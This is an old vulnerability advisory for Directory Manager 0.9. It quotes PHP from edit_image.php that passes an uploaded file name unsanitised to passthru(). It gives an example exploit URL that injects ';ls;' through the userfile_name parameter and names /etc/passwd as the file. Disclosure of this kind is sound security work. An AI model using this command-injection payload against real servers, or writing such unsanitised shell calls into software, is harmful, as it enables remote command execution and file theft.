Directory Manager Execute Command !BUG!

Version Affected :
Directory Manager 0.9

Directory Manager is a directory manager ;)
i realy don't know what he does. 
it has a serious security flaw, which allows 
any person to execute commands on attacked system
as webserver-user.

From edit_image.php :

if( !$dn ) Header( "Location: $defaultpage" );
...
if( is_file( $userfile ) && $userfile_name )
    {
    if( copy( $userfile, "/tmp/" . $userfile_name ) )
        {
	...
        passthru( "/usr/bin/convert -scale 600x600 /tmp/$userfile_name /tmp/$userfile_name.jpg" );
	...
	unlink( "/tmp/$userfile_name.jpg" );


So we can put an "evil code" into $userfile_name variable 
for example $userfile_name=;ls;
after it the second path transfer to /usr/bin/convert will look 
like this :
/tmp/;ls;.jpg

This is a correct path in unix and function copy won't fail, and
function passthru will execute ls ;)

Example Exploit :
victim.host/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20



Karol Wiesek - appelast <appelast@cdp.pl>

gr33tz : 
cliph - his brain is real fast, not all the time.
#BSquad - patataj
pruty - #BSquad cycler with broken hand ;) yeah he realy want to ride a bike 
	but he can't ;>
-------------------------------------------
	    __________@___        #BSquad
	   /              \     
	_ /   BUG POLICE   \__________
	|____   ________________   ____\
	     @@@                @@@  
-------------------------------------------------------